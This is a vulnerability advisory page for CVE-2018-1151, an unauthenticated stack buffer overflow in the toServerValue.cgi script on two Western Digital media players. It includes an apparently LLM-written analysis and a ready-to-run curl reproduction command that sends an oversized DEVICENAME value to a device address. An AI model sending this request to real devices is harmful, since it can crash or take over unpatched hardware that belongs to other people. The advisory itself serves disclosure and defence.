CVE-2018-1151
Description
The web server on Western Digital TV Media Player 1.03.07 and TV Live Hub 3.12.13 allow unauthenticated remote attackers to execute arbitrary code or cause denial of service via crafted HTTP requests to toServerValue.cgi.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
4- Range: = 3.12.13
- Range: = 1.03.07
- Western Digital/TV Live Hubv5Range: 3.12.13
- Western Digital/TV Media Playerv5Range: 1.03.07
Patches
Vulnerability mechanics
Root cause
"Missing input length validation on the DEVICENAME JSON parameter in toServerValue.cgi causes a stack buffer overflow."
Attack vector
An unauthenticated attacker on the local network sends a crafted HTTP POST request to `/cgi-bin/toServerValue.cgi` with an oversized `DEVICENAME` value in the JSON body. The CGI script does not validate the length of the input, causing a stack buffer overflow that overwrites the saved return address and other registers. Because the HTTP server runs as root, successful exploitation yields arbitrary code execution as root or causes a denial of service via crash [ref_id=1].
Affected code
The vulnerable CGI script is `/cgi-bin/toServerValue.cgi` on the Western Digital TV Media Player (firmware 1.03.07) and TV Live Hub (firmware 3.12.13). The `DEVICENAME` JSON parameter is copied into a fixed-size stack buffer without bounds checking, leading to a stack buffer overflow [ref_id=1].
What the fix does
No patch has been released by the vendor. The advisory notes that "a number of vulnerabilities in these devices have gone unpatched" and recommends isolating the devices as much as possible [ref_id=1]. A proper fix would require adding length validation on the `DEVICENAME` parameter before copying it into the stack buffer, or replacing the unsafe stack copy with a bounds-checked alternative.
Preconditions
- networkAttacker must have network access to the device's HTTP server (typically on the local LAN).
- authNo authentication is required; the CGI script is accessible without any credentials.
- inputThe attacker sends a POST request with a JSON body containing an oversized 'DEVICENAME' string.
Reproduction
curl -v -d '{"DEVICENAME":"WDLIVETVaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaAAAA"}' http://192.168.1.93/cgi-bin/toServerValue.cgi
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- www.tenable.com/security/research/tra-2018-14mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.